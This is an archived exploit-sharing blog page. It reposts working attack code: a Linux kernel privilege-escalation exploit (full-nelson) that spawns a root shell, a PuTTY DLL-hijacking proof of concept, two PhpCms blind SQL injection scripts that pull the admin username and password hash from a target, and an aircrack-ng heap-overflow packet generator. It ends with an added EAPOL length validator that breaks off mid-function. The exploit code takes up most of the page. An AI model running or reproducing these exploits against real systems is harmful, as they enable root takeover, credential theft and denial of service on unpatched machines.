Archive

Posts tagged 'Exploit'

kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images

May 16, 2011, no comments, 294 views

```text
# Exploit Title: kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
# Date: 2010
# Author: SA H4x0r
# Version: 2.6.18-20 , 2.6.32-24 Kernel 2010 i686 And x86_64 local Private Cant See Images
# Tested on: Linux System
# Link : Cant See Links
# Greetz : All Friends And v4-Team
```


Exploits Linux Kernel <= 2.6.37 local privilege escalation

December 16, 2010, no comments, 370 views

```c
/*
 * Linux Kernel <= 2.6.37 local privilege escalation
 * by Dan Rosenberg
 * @djrbliss on twitter
 *
 * Usage:
 * gcc full-nelson.c -o full-nelson
 * ./full-nelson
 *
 * This exploit leverages three vulnerabilities to get root, all of which were
 * discovered by Nelson Elhage:
 *
 * CVE-2010-4258
 * -------------
 * This is the interesting one, and the reason I wrote this exploit. If a
 * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
 * word will be written to a user-specified pointer when that thread exits.
 * This write is done using put_user(), which ensures the provided destination
 * resides in valid userspace by invoking access_ok(). However, Nelson
 * discovered that when the kernel performs an address limit override via
 * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
 * etc.), this override is not reverted before calling put_user() in the exit
 * path, allowing a user to write a NULL word to an arbitrary kernel address.
 * Note that this issue requires an additional vulnerability to trigger.
 *
 * CVE-2010-3849
 * -------------
 * This is a NULL pointer dereference in the Econet protocol. By itself, it's
 * fairly benign as a local denial-of-service. It's a perfect candidate to
 * trigger the above issue, since it's reachable via sock_no_sendpage(), which
 * subsequently calls sendmsg under KERNEL_DS.
 *
 * CVE-2010-3850
 * -------------
 * I wouldn't be able to reach the NULL pointer dereference and trigger the
 * OOPS if users weren't able to assign Econet addresses to arbitrary
 * interfaces due to a missing capabilities check.
 *
 * In the interest of public safety, this exploit was specifically designed to
 * be limited:
 *
 * * The particular symbols I resolve are not exported on Slackware or Debian
 * * Red Hat does not support Econet by default
 * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
 *   Debian
 *
 * However, the important issue, CVE-2010-4258, affects everyone, and it would
 * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
 * more sophisticated version of this that doesn't have the roadblocks I put in
 * to prevent abuse by script kiddies.
 *
 * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
 *
 * NOTE: the exploit process will deadlock and stay in a zombie state after you
 * exit your root shell because the Econet thread OOPSes while holding the
 * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.
 *
 * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
 */

#include <stdio.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <string.h>
#include <net/if.h>
#include <sched.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>

/* How many bytes should we clear in our
 * function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    struct utsname ver;
    int ret;
    int rep = 0;
    int oldstyle = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            goto fallback;
        oldstyle = 1;
    }

repeat:
    ret = 0;
    while(ret != EOF) {
        if (!oldstyle)
            ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
        else {
            ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                    continue;
                p = strrchr(sname, '_');
                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_')
                        p--;
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
            fclose(f);
            return addr;
        }
    }

    fclose(f);
    if (rep)
        return 0;
fallback:
    uname(&ver);
    if (strncmp(ver.release, "2.6", 3))
        oldstyle = 1;
    sprintf(sname, "/boot/System.map-%s", ver.release);
    f = fopen(sname, "r");
    if (f == NULL)
        return 0;
    rep = 1;
    goto repeat;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

/* Why do I do this? Because on x86-64, the address of
 * commit_creds and prepare_kernel_cred are loaded relative
 * to rip, which means I can't just copy the above payload
 * into my landing area. */
void __attribute__((regparm(3)))
trampoline()
{
#ifdef __x86_64__
    asm("mov $getroot, %rax; call *%rax;");
#else
    asm("mov $getroot, %eax; call *%eax;");
#endif
}

/* Triggers a NULL pointer dereference in econet_sendmsg
 * via sock_no_sendpage, so it's under KERNEL_DS */
int trigger(int * fildes)
{
    int ret;
    struct ifreq ifr;

    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

    ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
    if(ret < 0) {
        printf("[*] Failed to set Econet address.\n");
        return -1;
    }

    splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
    splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

    /* Shouldn't get here... */
    exit(0);
}

int main(int argc, char * argv[])
{
    unsigned long econet_ops, econet_ioctl, target, landing;
    int fildes[4], pid;
    void * newstack, * payload;

    /* Create file descriptors now so there are two
       references to them after cloning...otherwise
       the child will never return because it
       deadlocks when trying to unlock various
       mutexes after OOPSing */
    pipe(fildes);
    fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
    fildes[3] = open("/dev/zero", O_RDONLY);

    if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {
        printf("[*] Failed to open file descriptors.\n");
        return -1;
    }

    /* Resolve addresses of relevant symbols */
    printf("[*] Resolving kernel addresses...\n");
    econet_ioctl = get_kernel_sym("econet_ioctl");
    econet_ops = get_kernel_sym("econet_ops");
    commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

    if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
        printf("[*] Failed to resolve kernel symbols.\n");
        return -1;
    }

    if(!(newstack = malloc(65536))) {
        printf("[*] Failed to allocate memory.\n");
        return -1;
    }

    printf("[*] Calculating target...\n");
    target = econet_ops + 10 * sizeof(void *) - OFFSET;

    /* Clear the higher bits */
    landing = econet_ioctl << SHIFT >> SHIFT;

    payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
                   PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

    if ((long)payload == -1) {
        printf("[*] Failed to mmap() at target address.\n");
        return -1;
    }

    memcpy((void *)landing, &trampoline, 1024);

    clone((int (*)(void *))trigger,
          (void *)((unsigned long)newstack + 65536),
          CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
          &fildes, NULL, NULL, target);

    sleep(1);

    printf("[*] Triggering payload...\n");
    ioctl(fildes[2], 0, NULL);

    if(getuid()) {
        printf("[*] Exploit failed to get root.\n");
        return -1;
    }

    printf("[*] Got root!\n");
    execl("/bin/sh", "/bin/sh", NULL);
}
```


PuTTY 0.60 DLL Hijacking Exploit (winmm.dll)

August 26, 2010, no comments, 279 views

```c
/*
Exploit Title: PuTTY DLL Hijacking Exploit (winmm.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Version: 0.60
Tested on: Windows Vista SP2
http://www.gonullyourself.org/

gcc -shared -o winmm.dll PuTTY-DLL.c -DWIN32_LEAN_AND_MEAN

PuTTY is a standalone program, so just plop the .dll in whatever directory the binary is in.
*/

#include <windows.h>

#define DllExport __declspec (dllexport)

DllExport void aux32Message() { hax(); }
DllExport void auxGetDevCapsA() { hax(); }
DllExport void auxGetDevCapsW() { hax(); }
DllExport void auxGetNumDevs() { hax(); }
DllExport void auxGetVolume() { hax(); }
DllExport void auxOutMessage() { hax(); }
DllExport void auxSetVolume() { hax(); }
DllExport void CloseDriver() { hax(); }
DllExport void DefDriverProc() { hax(); }
DllExport void DriverCallback() { hax(); }
DllExport void DrvGetModuleHandle() { hax(); }
DllExport void GetDriverModuleHandle() { hax(); }
DllExport void joy32Message() { hax(); }
DllExport void joyConfigChanged() { hax(); }
DllExport void joyGetDevCapsA() { hax(); }
DllExport void joyGetDevCapsW() { hax(); }
DllExport void joyGetNumDevs() { hax(); }
DllExport void joyGetPos() { hax(); }
DllExport void joyGetPosEx() { hax(); }
DllExport void joyGetThreshold() { hax(); }
DllExport void joyReleaseCapture() { hax(); }
DllExport void joySetCapture() { hax(); }
DllExport void joySetThreshold() { hax(); }
DllExport void mci32Message() { hax(); }
DllExport void mciDriverNotify() { hax(); }
DllExport void mciDriverYield() { hax(); }
DllExport void mciExecute() { hax(); }
DllExport void mciFreeCommandResource() { hax(); }
DllExport void mciGetCreatorTask() { hax(); }
DllExport void mciGetDeviceIDA() { hax(); }
DllExport void mciGetDeviceIDFromElementIDA() { hax(); }
DllExport void mciGetDeviceIDFromElementIDW() { hax(); }
DllExport void mciGetDeviceIDW() { hax(); }
DllExport void mciGetDriverData() { hax(); }
DllExport void mciGetErrorStringA() { hax(); }
DllExport void mciGetErrorStringW() { hax(); }
DllExport void mciGetYieldProc() { hax(); }
DllExport void mciLoadCommandResource() { hax(); }
DllExport void mciSendCommandA() { hax(); }
DllExport void mciSendCommandW() { hax(); }
DllExport void mciSendStringA() { hax(); }
DllExport void mciSendStringW() { hax(); }
DllExport void mciSetDriverData() { hax(); }
DllExport void mciSetYieldProc() { hax(); }
DllExport void mid32Message() { hax(); }
DllExport void midiConnect() { hax(); }
DllExport void midiDisconnect() { hax(); }
DllExport void midiInAddBuffer() { hax(); }
DllExport void midiInClose() { hax(); }
DllExport void midiInGetDevCapsA() { hax(); }
DllExport void midiInGetDevCapsW() { hax(); }
DllExport void midiInGetErrorTextA() { hax(); }
DllExport void midiInGetErrorTextW() { hax(); }
DllExport void midiInGetID() { hax(); }
DllExport void midiInGetNumDevs() { hax(); }
DllExport void midiInMessage() { hax(); }
DllExport void midiInOpen() { hax(); }
DllExport void midiInPrepareHeader() { hax(); }
DllExport void midiInReset() { hax(); }
DllExport void midiInStart() { hax(); }
DllExport void midiInStop() { hax(); }
DllExport void midiInUnprepareHeader() { hax(); }
DllExport void midiOutCacheDrumPatches() { hax(); }
DllExport void midiOutCachePatches() { hax(); }
DllExport void midiOutClose() { hax(); }
DllExport void midiOutGetDevCapsA() { hax(); }
DllExport void midiOutGetDevCapsW() { hax(); }
DllExport void midiOutGetErrorTextA() { hax(); }
DllExport void midiOutGetErrorTextW() { hax(); }
DllExport void midiOutGetID() { hax(); }
DllExport void midiOutGetNumDevs() { hax(); }
DllExport void midiOutGetVolume() { hax(); }
DllExport void midiOutLongMsg() { hax(); }
DllExport void midiOutMessage() { hax(); }
DllExport void midiOutOpen() { hax(); }
DllExport void midiOutPrepareHeader() { hax(); }
DllExport void midiOutReset() { hax(); }
DllExport void midiOutSetVolume() { hax(); }
DllExport void midiOutShortMsg() { hax(); }
DllExport void midiOutUnprepareHeader() { hax(); }
DllExport void midiStreamClose() { hax(); }
DllExport void midiStreamOpen() { hax(); }
DllExport void midiStreamOut() { hax(); }
DllExport void midiStreamPause() { hax(); }
DllExport void midiStreamPosition() { hax(); }
DllExport void midiStreamProperty() { hax(); }
DllExport void midiStreamRestart() { hax(); }
DllExport void midiStreamStop() { hax(); }
DllExport void mixerClose() { hax(); }
DllExport void mixerGetControlDetailsA() { hax(); }
DllExport void mixerGetControlDetailsW() { hax(); }
DllExport void mixerGetDevCapsA() { hax(); }
DllExport void mixerGetDevCapsW() { hax(); }
DllExport void mixerGetID() { hax(); }
DllExport void mixerGetLineControlsA() { hax(); }
DllExport void mixerGetLineControlsW() { hax(); }
DllExport void mixerGetLineInfoA() { hax(); }
DllExport void mixerGetLineInfoW() { hax(); }
DllExport void mixerGetNumDevs() { hax(); }
DllExport void mixerMessage() { hax(); }
DllExport void mixerOpen() { hax(); }
DllExport void mixerSetControlDetails() { hax(); }
DllExport void mmDrvInstall() { hax(); }
DllExport void mmGetCurrentTask() { hax(); }
DllExport void mmioAdvance() { hax(); }
DllExport void mmioAscend() { hax(); }
DllExport void mmioClose() { hax(); }
DllExport void mmioCreateChunk() { hax(); }
DllExport void mmioDescend() { hax(); }
DllExport void mmioFlush() { hax(); }
DllExport void mmioGetInfo() { hax(); }
DllExport void mmioInstallIOProcA() { hax(); }
DllExport void mmioInstallIOProcW() { hax(); }
DllExport void mmioOpenA() { hax(); }
DllExport void mmioOpenW() { hax(); }
DllExport void mmioRead() { hax(); }
DllExport void mmioRenameA() { hax(); }
DllExport void mmioRenameW() { hax(); }
DllExport void mmioSeek() { hax(); }
DllExport void mmioSendMessage() { hax(); }
DllExport void mmioSetBuffer() { hax(); }
DllExport void mmioSetInfo() { hax(); }
DllExport void mmioStringToFOURCCA() { hax(); }
DllExport void mmioStringToFOURCCW() { hax(); }
DllExport void mmioWrite() { hax(); }
DllExport void mmsystemGetVersion() { hax(); }
DllExport void mmTaskBlock() { hax(); }
DllExport void mmTaskCreate() { hax(); }
DllExport void mmTaskSignal() { hax(); }
DllExport void mmTaskYield() { hax(); }
DllExport void mod32Message() { hax(); }
DllExport void mxd32Message() { hax(); }
DllExport void NotifyCallbackData() { hax(); }
DllExport void OpenDriver() { hax(); }
DllExport void PlaySound() { hax(); }
DllExport void PlaySoundA() { hax(); }
DllExport void PlaySoundW() { hax(); }
DllExport void SendDriverMessage() { hax(); }
DllExport void sndPlaySoundA() { hax(); }
DllExport void sndPlaySoundW() { hax(); }
DllExport void tid32Message() { hax(); }
DllExport void timeBeginPeriod() { hax(); }
DllExport void timeEndPeriod() { hax(); }
DllExport void timeGetDevCaps() { hax(); }
DllExport void timeGetSystemTime() { hax(); }
DllExport void timeGetTime() { hax(); }
DllExport void timeKillEvent() { hax(); }
DllExport void timeSetEvent() { hax(); }
DllExport void waveInAddBuffer() { hax(); }
DllExport void waveInClose() { hax(); }
DllExport void waveInGetDevCapsA() { hax(); }
DllExport void waveInGetDevCapsW() { hax(); }
DllExport void waveInGetErrorTextA() { hax(); }
DllExport void waveInGetErrorTextW() { hax(); }
DllExport void waveInGetID() { hax(); }
DllExport void waveInGetNumDevs() { hax(); }
DllExport void waveInGetPosition() { hax(); }
DllExport void waveInMessage() { hax(); }
DllExport void waveInOpen() { hax(); }
DllExport void waveInPrepareHeader() { hax(); }
DllExport void waveInReset() { hax(); }
DllExport void waveInStart() { hax(); }
DllExport void waveInStop() { hax(); }
DllExport void waveInUnprepareHeader() { hax(); }
DllExport void waveOutBreakLoop() { hax(); }
DllExport void waveOutClose() { hax(); }
DllExport void waveOutGetDevCapsA() { hax(); }
DllExport void waveOutGetDevCapsW() { hax(); }
DllExport void waveOutGetErrorTextA() { hax(); }
DllExport void waveOutGetErrorTextW() { hax(); }
DllExport void waveOutGetID() { hax(); }
DllExport void waveOutGetNumDevs() { hax(); }
DllExport void waveOutGetPitch() { hax(); }
DllExport void waveOutGetPlaybackRate() { hax(); }
DllExport void waveOutGetPosition() { hax(); }
DllExport void waveOutGetVolume() { hax(); }
DllExport void waveOutMessage() { hax(); }
DllExport void waveOutOpen() { hax(); }
DllExport void waveOutPause() { hax(); }
DllExport void waveOutPrepareHeader() { hax(); }
DllExport void waveOutReset() { hax(); }
DllExport void waveOutRestart() { hax(); }
DllExport void waveOutSetPitch() { hax(); }
DllExport void waveOutSetPlaybackRate() { hax(); }
DllExport void waveOutSetVolume() { hax(); }
DllExport void waveOutUnprepareHeader() { hax(); }
DllExport void waveOutWrite() { hax(); }
DllExport void wid32Message() { hax(); }
DllExport void wod32Message() { hax(); }
DllExport void WOW32DriverCallback() { hax(); }
DllExport void WOW32ResolveMultiMediaHandle() { hax(); }
DllExport void WOWAppExit() { hax(); }

int hax()
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
    hax();
    return 0;
}
```


PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)

May 8, 2010, no comments, 164 views

```php
<?php
ini_set("max_execution_time",0);
error_reporting(7);

function usage()
{
    global $argv;
    exit(
        "\n--+++============================================================+++--".
        "\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".
        "\n--+++============================================================+++--".
        "\n\n[+] Author: My5t3ry".
        "\n[+] Team: [url]http://www.t00ls.net[/url]".
        "\n[+] Usage: php ".$argv[0]." <hostname> <path>".
        "\n[+] Ex.: php ".$argv[0]." localhost /yp".
        "\n\n");
}

function query($pos, $chr, $chs)
{
    global $prefix;
    switch ($chs){
        case 1:
            $query = "1=1 and if((ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";
            break;
        case 2:
            $query = "1=1 and if((ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";
            break;
        case 3:
            $query = "1=1 and if((length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#";
            break;
    }
    $query = str_replace(" ", "/**/", $query);
    $query = urlencode($query);
    return $query;
}

function exploit($hostname, $path, $pos, $chr, $chs)
{
    $chr = ord($chr);
    $conn = fsockopen($hostname, 80);
    $postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);
    $message = "POST ".$path."/product.php HTTP/1.1\r\n";
    $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "Accept-Encoding: gzip, deflate\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $hostname\r\n";
    $message .= "Content-Length: ".strlen($postdata)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $postdata;
    //echo $message;
    $time_a = time();
    fputs($conn, $message);
    while (!feof($conn))
        $reply .= fgets($conn, 1024);
    $time_b = time();
    fclose($conn);
    //echo $time_b - $time_a."\r\n";
    if ($time_b - $time_a > 4)
        return true;
    else
        return false;
}

function crkusername($hostname, $path, $chs)
{
    global $length;
    $key = "abcdefghijklmnopqrstuvwxyz0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] username: ";
    while ($pos <= $length)
    {
        if (exploit($hostname, $path, $pos, $key[$chr], $chs))
        {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n";
}

function crkpassword($hostname, $path, $chs)
{
    $key = "abcdef0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] password: ";
    while ($pos <= 32)
    {
        if (exploit($hostname, $path, $pos, $key[$chr], $chs))
        {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n\n";
}

function lengthcolumns($hostname, $path, $chs)
{
    echo "[+] username length: ";
    $exit = 0;
    $length = 0;
    $pos = 0;
    $chr = 0;
    while ($exit==0)
    {
        if (exploit($hostname, $path, $pos, $chr, $chs))
        {
            $exit = 1;
            $length = $pos;
        }
        else
            $pos++;
    }
    echo $length."\n";
    return $length;
}

function getprefix($hostname, $path)
{
    echo "[+] prefix: ";
    $conn = fsockopen($hostname, 80);
    $request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";
    $request .= "Host: {$hostname}\r\n";
    $request .= "Connection: Close\r\n\r\n";
    fputs($conn, $request);
    while (!feof($conn))
        $reply .= fgets($conn, 1024);
    fclose($conn);
    preg_match('/FROM `(.+)yp_product/ie',$reply,$match);
    if ($match[1])
        return $match[1];
    else
        return false;
}

if ($argc != 3)
    usage();
$prefix="";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path);
if ($prefix)
{
    echo $prefix."\r\n";
    $length = lengthcolumns($hostname, $path, 3);
    crkusername($hostname, $path, 1);
    crkpassword($hostname, $path, 2);
}
else
{
    exit("Exploit failed");
}
?>
```

PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)

May 8, 2010, no comments, 158 views

```php
<?php
ini_set("max_execution_time",0);
error_reporting(7);

function usage()
{
    global $argv;
    exit(
        "\n--+++============================================================+++--".
        "\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".
        "\n--+++============================================================+++--".
        "\n\n[+] Author: My5t3ry".
        "\n[+] Team: [url]http://www.t00ls.net[/url]".
        "\n[+] Usage: php ".$argv[0]." <hostname> <path>".
        "\n[+] Ex.: php ".$argv[0]." localhost /yp".
        "\n\n");
}

function query($pos, $chr, $chs)
{
    global $prefix;
    switch ($chs){
        case 0:
            $query = "#";
            break;
        case 1:
            $query = " ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";
            break;
        case 2:
            $query = " ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";
            break;
        case 3:
            $query = " length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}#";
            break;
    }
    $query = str_replace(" ", "/**/", $query);
    $query = urlencode($query);
    return $query;
}

function exploit($hostname, $path, $pos, $chr, $chs)
{
    $chr = ord($chr);
    $conn = fsockopen($hostname, 80);
    //print_r($conn);
    /*if (!$conn){
        exit("\r\n[-] No response from $conn");
    }*/
    $postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);
    $message = "POST ".$path."/product.php HTTP/1.1\r\n";
    $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "Accept-Encoding: gzip, deflate\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $hostname\r\n";
    $message .= "Content-Length: ".strlen($postdata)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $postdata;
    //echo $message;
    fputs($conn, $message);
    while (!feof($conn))
        $reply .= fgets($conn, 1024);
    fclose($conn);
    return $reply;
}

function crkusername($hostname, $path, $chs)
{
    global $length;
    $key = "abcdefghijklmnopqrstuvwxyz0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] username: ";
    while ($pos <= $length)
    {
        $response = exploit($hostname, $path, $pos, $key[$chr], $chs);
        preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);
        if (strlen(trim($match[1])) != 0)
        {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n";
}

function crkpassword($hostname, $path, $chs)
{
    $key = "abcdef0123456789";
    $chr = 0;
    $pos = 1;
    echo "[+] password: ";
    while ($pos <= 32)
    {
        $response = exploit($hostname, $path, $pos, $key[$chr], $chs);
        preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);
        if (strlen(trim($match[1])) != 0)
        {
            echo $key[$chr];
            $chr = 0;
            $pos++;
        }
        else
            $chr++;
    }
    echo "\n\n";
}

function lengthcolumns($hostname, $path, $chs)
{
    echo "[+] username length: ";
    $exit = 0;
    $length = 0;
    $pos = 1;
    $chr = 0;
    while ($exit==0)
    {
        $response = exploit($hostname, $path, $pos, $chr, $chs);
        preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);
        if (strlen(trim($match[1])) != 0)
        {
            $exit = 1;
            $length = $pos;
        }
        else
            $pos++;
    }
    echo $length."\n";
    return $length;
}

function getprefix($hostname, $path, $chs)
{
    echo "[+] prefix: ";
    $pos = 0;
    $chr = 0;
    $response = exploit($hostname, $path, $pos, $chr, $chs);
    preg_match('/FROM `(.+)yp_product/ie',$response,$match);
    if ($match[1])
        return $match[1];
    else
        return false;
}

if ($argc != 3)
    usage();
$prefix="";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path, 0);
if ($prefix)
{
    echo $prefix."\r\n";
    $length = lengthcolumns($hostname, $path, 3);
    crkusername($hostname, $path, 1);
    crkpassword($hostname, $path, 2);
}
else
{
    exit("\r\n[-] Exploit failed");
}
?>
```

Remote Exploit Against the Aircrack-NG Tools svn r1675

April 15, 2010, no comments, 113 views

```python
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
''' A remote-exploit against the aircrack-ng tools. Tested up to svn r1675.

    The tools' code responsible for parsing IEEE802.11-packets assumes the
    self-proclaimed length of a EAPOL-packet to be correct and never to exceed
    a (arbitrary) maximum size of 256 bytes for packets that are part of the
    EAPOL-authentication. We can exploit this by letting the code parse packets
    which:
      a) proclaim to be larger than they really are, possibly causing the code
         to read from invalid memory locations while copying the packet;
      b) really do exceed the maximum size allowed and overflow data structures
         allocated on the heap, overwriting libc's allocation-related
         structures. This causes heap-corruption.
    Both problems lead either to a SIGSEGV or a SIGABRT, depending on the code-
    path. Careful layout of the packet's content can even possibly alter the
    instruction-flow through the already well known heap-corruption paths
    in libc. Playing with the proclaimed length of the EAPOL-packet and the
    size and content of the packet's padding immediately end up in various
    assertion errors during calls to free(). This reveals the possibility to
    gain control over $EIP.

    Given that we have plenty of room for payload and that the tools are
    usually executed with root-privileges, we should be able to have a
    single-packet-own-everything exploit at our hands. As the attacker can
    cause the various tools to do memory-allocations at his will (through
    faking the appearance of previously unknown clients), the resulting
    exploit-code should have a high probability of success.

    The demonstration-code below requires Scapy >= 2.x and Pyrit >= 0.3.1-dev
    r238 to work. It generates pcap-file with single packet of the following
    content:

    0801000000DEADC0DE0000DEADC0DE010000000000000000AAAA03000000888E0103FDE8FE0
    108000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000043616E20492068617320736F6D65206D6F6172
    3F

    03/27/2010, Lukas Lueg, lukas.lueg@gmail.com
'''

import cpyrit.pckttools
import scapy.layers

# A IEEE802.11-packet with LLC- and SNAP-header, looking like the second
# phase of a EAPOL-handshake (the confirmation). The size set in the EAPOL-
# packet will cause an overflow of the "eapol"-field in struct WPA_ST_info and
# struct WPA_hdsk.
# We have plenty of room for exploit-payload as most of the fields in the
# EAPOL_Key-packet are not interpreted. As far as I can see, the adjacent
# heap structure will be overwritten by the value of EAPOL_WPAKey.Nonce in
# case of airodump-ng...
pckt = scapy.layers.dot11.Dot11(addr1='00:de:ad:c0:de:00', \
                                addr2='00:de:ad:c0:de:01', \
                                FCfield='to-DS') \
       / scapy.layers.dot11.LLC() \
       / scapy.layers.dot11.SNAP() \
       / scapy.layers.l2.EAPOL(len=65000) \
       / cpyrit.pckttools.EAPOL_Key() \
       / cpyrit.pckttools.EAPOL_WPAKey(KeyInfo = 'pairwise+mic') \
       / scapy.packet.Padding(load='Can I has some moar?')

if __name__ == '__main__':
    print "Packet's content:"
    print ''.join("%02X" % ord(c) for c in str(pckt))
    filename = 'aircrackng_exploit.cap'
    print "Writing to '%s'" % filename
    writer = cpyrit.pckttools.Dot11PacketWriter(filename)
    writer.write(pckt)
    writer.close()
    print 'Done'
```
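As an added illustration (not part of the original post or of aircrack-ng itself), the length validation the docstring says the parsers lacked: it checks the EAPOL length field against both the bytes actually present in the frame and the fixed 256-byte buffer the text describes, rejecting both failure modes. The frame layout helper and the three inputs are constructed here; the first input mirrors the packet shown above.

```python
import struct

EAPOL_ETHERTYPE = 0x888E
# The 256-byte bound the aircrack-ng parsers assumed but, per the description
# above, never enforced against the EAPOL length field.
MAX_EAPOL_LEN = 256


def dot11_data_header_len(frame: bytes) -> int:
    """Return the 802.11 MAC header size of a data frame (24, 26, 30 or 32 bytes)."""
    (fc,) = struct.unpack_from("<H", frame, 0)          # frame control is little-endian
    if (fc >> 2) & 0x3 != 2:
        raise ValueError("not a data frame")
    to_ds, from_ds = bool(fc & 0x0100), bool(fc & 0x0200)
    qos = bool((fc >> 4) & 0x8)                          # subtype bit 3 marks QoS data
    return 24 + (6 if to_ds and from_ds else 0) + (2 if qos else 0)


def check_eapol_frame(frame: bytes, max_eapol_len: int = MAX_EAPOL_LEN) -> dict:
    """Validate the EAPOL packet carried in a data frame before anything is copied.

    Rejects a length field that claims more bytes than the frame holds (the
    over-read case) and a body that really is larger than the fixed buffer
    (the heap-overflow case).
    """
    try:
        off = dot11_data_header_len(frame)
    except (ValueError, struct.error) as exc:
        return {"ok": False, "reason": str(exc)}
    if len(frame) < off + 8 + 4:
        return {"ok": False, "reason": "frame too short for LLC/SNAP and EAPOL headers"}
    if frame[off:off + 6] != b"\xaa\xaa\x03\x00\x00\x00":
        return {"ok": False, "reason": "missing LLC/SNAP header"}
    (ethertype,) = struct.unpack_from(">H", frame, off + 6)
    if ethertype != EAPOL_ETHERTYPE:
        return {"ok": False, "reason": "ethertype 0x%04x is not EAPOL" % ethertype}
    eapol_off = off + 8
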